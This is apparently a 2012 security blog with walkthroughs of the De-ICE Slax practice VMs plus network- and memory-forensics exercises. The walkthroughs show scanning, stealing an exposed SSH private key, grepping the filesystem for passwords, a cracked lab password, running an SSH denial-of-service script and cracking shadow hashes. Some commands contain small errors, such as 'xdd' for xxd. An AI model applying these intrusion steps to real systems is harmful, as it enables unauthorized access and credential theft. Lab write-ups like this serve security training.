Pages

Wednesday 14 November 2012

Slax De-ICE v2.100 Solution

Posted by at 07:46

#Information Gathering


Scaning using Netdiscover :

Scanning with Nmap :
result for information gathering:
root@bt:~# nmap -sS -A 192.168.2.100

Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-12 04:49 EST
Nmap scan report for 192.168.2.100
Host is up (0.0011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.105], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: LOGIN-REFERRALS THREAD=ORDEREDSUBJECT UNSELECT SCAN AUTH=LOGINA0001 MAILBOX-REFERRALS BINARY IMAP4REV1 completed THREAD=REFERENCES SASL-IR OK CAPABILITY SORT STARTTLS LITERAL+ IDLE NAMESPACE MULTIAPPEND
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.2.100

In address 192.168.2.100:80 I have found some credential information about developer and marketer.

# Service Enumeration


20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357

# Vulnerability Assesment

 1.    FTP Login Anonymous allowed
 2.    OpenSSH Denial of Service
 3.    Directory Listing

# Exploitation

First, I'm interesting with FTP login but I dont't get anything in the ftp.

Second, I have try on openSSH with vulnerable DOS. Try using this exploit and the ssh service temporary down. /pentest/exploits/exploitdb# platforms/multiple/dos/2444.sh

Third, I'm trying to directory listing on http service. this part separated into 3 step :
  1. Create userlisting from available info in their web site.


  2. Create file listing for common user in linux syste,
  3. Combination userlisting and filelisting with dirb, dirb available in backtrack.

root@bt:/pentest/web/dirb# ./dirb http://192.168.2.101/ /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

Dirb usage:

root@bt:/pentest/web/dirb# ./dirb http://192.168.2.101/ /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Mon Nov 12 22:26:48 2012
URL_BASE: http://192.168.2.101/
WORDLIST_FILES: /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt
OPTION: Printing LOCATION header
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 348

---- Scanning URL: http://192.168.2.101/ ----
+ http://192.168.2.101/~havisham/
==> DIRECTORY
+ http://192.168.2.101/~magwitch/
==> DIRECTORY
+ http://192.168.2.101/~pirrip/
==> DIRECTORY
+ http://192.168.2.101/.
(FOUND: 200 [Ok] - Size: 579)
+ http://192.168.2.101/..
(FOUND: 400 [Bad Request] - Size: 313)

---- Entering directory: http://192.168.2.101/~havisham/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~havisham/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~havisham/..
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: http://192.168.2.101/~magwitch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~magwitch/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~magwitch/..
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: http://192.168.2.101/~pirrip/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.
(FOUND: 200 [Ok] - Size: 566)
+ http://192.168.2.101/~pirrip/..
(FOUND: 200 [Ok] - Size: 579)
+ http://192.168.2.101/~pirrip/.ssh/
==> DIRECTORY

---- Entering directory: http://192.168.2.101/~pirrip/.ssh/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.ssh/.
(FOUND: 200 [Ok] - Size: 816)
+ http://192.168.2.101/~pirrip/.ssh/..
(FOUND: 200 [Ok] - Size: 566)

-----------------
DOWNLOADED: 1740 - FOUND: 10



From the dirb, you can see ~pirrip/.ssh/ listing. Then open it from your browser and download the id_rsa and id_rsa.pub. Two files is ssh key authentication. Now connect to the machine target with ssh.

# ssh -i id_rsa pirrip@192.168.2.100

Well, we have connected into target machine. But we don't know what is the password of pirrip.

Finally I'm using grep to find string with password.

# grep -r "Password" /

For the long time, I got the password of pirrip -> 0l1v3rtw1st

Friday 9 November 2012

Slax v.110

Posted by at 02:56
# Information Gathering

In this part, I will IG the target using Nmap with the command :
# nmap -sS -A 192.168.1.110
and return the result ->


# Service Enumeration

FTP (vsftpd)
SSH
CUPS Print
HTTPd

# Vulnerability Assesment

From the Information Gathering and Service Enumeration result, we know that FTP are allowed the user to login anonymously. May be we can get some interesting file inside.

Before, I have trial to get each file on it. But I'm intersting with core file.
Download it and open it, I'm opened it using cat, look scream...
Try to open it with 'strings' command, w00t we got the string of shadow file.
Now separated the shadow string and the other, copy the shadow string and copy it into text editor.




# Exploitation

Now time to crack the shadow, I used John THe Ripper to do this job. And finally, we got it. Enjoy!


Saturday 3 November 2012

Network Forensic Puzzle #1

Posted by at 07:39
Yesterday I was learn about Network Forensic, and my case is captured paket using Wireshark. You can download the capture file here.

After download the capture. We can open it wid DD and then capture it.
For short tutor we can use the dumb way. In this case I will pulling data named "recovery.docx" So, we need to know what is the header / magic number of docx files.
If you don't know about magic number, you can browse it on Google with keyword magic number programming. The magic number of docx file is 504B. Ok, you got the key now.

Now I will use tcpflow to split the each packet on the capture file.

# tcpflow -r evidence.pcap

and some split is 192.168.001.158.05190-192.168.001.159-01272. For short tuts, I have select the splited file that contain receipe.docx

The captured file is contains hexa. With DD you can see the hexa of captured file. I used the dumb trick method to pull up the captured file. First I will convert the file into raw.

# xdd -ps 192.168.001.158.05190-192.168.001.159-01272 > raw.txt

Open the raw.txt with text editor like gEdit or Kate. Then search word 504B, at the first time of returned result. Please remove the line/text before 504B, and then save it.

Back to DD, and convert the raw.txt into binary.

#xdd -r -ps raw.txt > receipe.docx

Finally, open the receipe.docx with Word Processor like MS Office or Libre Office.

Memory Forensic

Posted by at 01:10
Today I was learn about Memory Forensic. My target is windows xp, before I have been dump memory from windows xp using AccessData FTK. After dumping memory, I copied the dump memory into backtrack, and then open it using Volatile.
# ./vol.py -f /path/of/memorydump.mem imageinfo
after run the command above, you will see some information about memory info.

Using volatile you can see proccess,networking, and much more.
The image above will show some feature of Volatile tool.




I think we can dump password for windows machine using volatile. You can use hashdump and havelist.


Images below show me how many connections in my windows machine. We can see that someone with ip address 192.168.56.102 connected to my machine with port 6660 and 4444 in the same PID. May be someone was attack my machine using vulnerability on BigAnt and connect back with opening port 4444.


In this case, we can see history of cmd command typed by user before memory dumped using FTK.


©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template